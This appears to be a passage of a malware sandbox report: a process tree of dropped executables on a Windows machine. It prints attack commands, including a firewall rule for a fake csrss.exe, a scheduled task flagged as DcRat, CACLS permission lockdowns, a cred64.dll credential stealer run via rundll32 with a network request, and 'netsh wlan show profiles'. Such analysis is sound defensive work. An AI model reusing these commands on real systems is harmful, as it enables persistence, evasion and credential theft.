"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
4⤵
PID:744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3580 /prefetch:8
4⤵
PID:820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3568 /prefetch:3
4⤵
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3400 /prefetch:2
4⤵
PID:1056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
4⤵
PID:2492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
4⤵
PID:2452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
4⤵
PID:5300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
4⤵
PID:5436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
4⤵
PID:5544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
4⤵
PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
4⤵
PID:5988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
4⤵
PID:1732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
4⤵
PID:5196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2900 /prefetch:8
4⤵
PID:1048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6928 /prefetch:8
4⤵
PID:5656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:1
4⤵
PID:6980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
4⤵
PID:2872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8248 /prefetch:1
4⤵
PID:1588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2184 /prefetch:1
4⤵
PID:5904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:4332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
3⤵
PID:1368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:4876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
3⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:5248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
3⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:5376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
3⤵
PID:5652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
3⤵
PID:5776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:5848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
3⤵
PID:6092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\1D68.exe
C:\Users\Admin\AppData\Local\Temp\1D68.exe
2⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\222C.exe
C:\Users\Admin\AppData\Local\Temp\222C.exe
2⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\AppData\Local\Temp\4C98.exe
C:\Users\Admin\AppData\Local\Temp\4C98.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5860

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
- Executes dropped EXE
PID:3044

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2240

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5856

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6248

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
3⤵
- Executes dropped EXE
PID:5176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:2000

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:2832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6016

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:6752

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 872
4⤵
- Program crash
PID:4944

C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5952

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Executes dropped EXE
PID:7016

C:\Users\Admin\AppData\Local\Temp\is-GH6NI.tmp\is-DF3MM.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GH6NI.tmp\is-DF3MM.tmp" /SL4 $40240 "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 5428361 110592
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5232

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 2
6⤵
PID:6372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 2
7⤵
PID:5884

C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1123.exe
"C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1123.exe" -i
6⤵
- Executes dropped EXE
PID:6596

C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1123.exe
"C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1123.exe" -s
6⤵
- Executes dropped EXE
PID:1100

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:6228

C:\Users\Admin\AppData\Local\Temp\51AA.exe
C:\Users\Admin\AppData\Local\Temp\51AA.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:5952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
4⤵
PID:2504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
4⤵
PID:3464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
4⤵
PID:7056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
4⤵
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
4⤵
PID:5752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
4⤵
PID:6084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:1
4⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
4⤵
PID:3204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
4⤵
PID:1500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:1
4⤵
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8
4⤵
PID:6032

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,18005826811199798648,3724244779378446479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8
4⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\5A27.exe
C:\Users\Admin\AppData\Local\Temp\5A27.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 840
3⤵
- Program crash
PID:552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 840
3⤵
- Program crash
PID:6172

C:\Users\Admin\AppData\Local\Temp\660F.exe
C:\Users\Admin\AppData\Local\Temp\660F.exe
2⤵
- Executes dropped EXE
PID:5888

C:\Users\Admin\AppData\Local\Temp\8178.exe
C:\Users\Admin\AppData\Local\Temp\8178.exe
2⤵
- Executes dropped EXE
PID:6372

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:6688

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
4⤵
- DcRat
- Creates scheduled task(s)
PID:3288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit
4⤵
PID:6552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:7080

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
5⤵
PID:7068

C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
5⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:6188

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:N"
5⤵
PID:5968

C:\Windows\SysWOW64\cacls.exe
CACLS "..\e8b5234212" /P "Admin:R" /E
5⤵
PID:1564

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6016

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4488

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:1220

C:\Windows\system32\tar.exe
